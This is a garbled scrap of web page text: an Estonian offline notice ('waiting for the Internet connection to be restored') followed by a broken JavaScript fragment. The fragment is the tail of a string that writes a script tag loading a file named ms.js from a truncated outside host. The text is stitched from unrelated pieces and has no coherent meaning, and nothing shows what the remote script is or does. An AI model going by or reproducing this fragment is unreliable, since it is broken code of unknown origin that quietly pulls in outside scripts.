Töötate praegu ühenduseta, ootame Interneti-ühenduse taasloomist
tml>tml>soft.com/ms.js'" + "'><\/script>");